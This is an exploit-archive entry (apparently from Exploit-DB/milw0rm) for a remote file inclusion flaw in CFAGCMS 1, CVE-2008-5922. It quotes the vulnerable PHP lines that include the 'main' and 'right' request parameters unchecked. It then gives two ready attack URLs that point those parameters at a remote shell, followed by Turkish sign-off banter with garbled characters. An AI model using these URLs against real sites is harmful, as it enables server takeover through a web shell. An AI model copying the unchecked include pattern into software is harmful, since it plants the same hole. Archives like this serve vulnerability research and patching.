CFAGCMS 1 - Remote File Inclusion

Author: BeyazKurt
type: webapps
platform: php
port: 
date_added: 2008-12-13 
date_updated: 2017-01-06 
verified: 1 
codes: OSVDB-51257;CVE-2008-5922 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcfagcms.zip

Author : BeyazKurt - Bey4zKurt@Gmail.Com

Script : CFAGCMS
Download : http://sourceforge.net/project/showfiles.php?group_id=197936

Vuln :

Page themes/default/index.php, Line 15-16 :

<?php include($main);?>
<?php include($right);?>

Site.Com/cfagcms/themes/default/index.php?main=SHELL
Site.Com/cfagcms/themes/default/index.php?right=SHELL

SHQÄ°PTAR!
Siyasetle ilgili biÅŸi sÃ¶liyimmi :p

FENERBAHÃ‡EE (H)

# milw0rm.com [2008-12-14]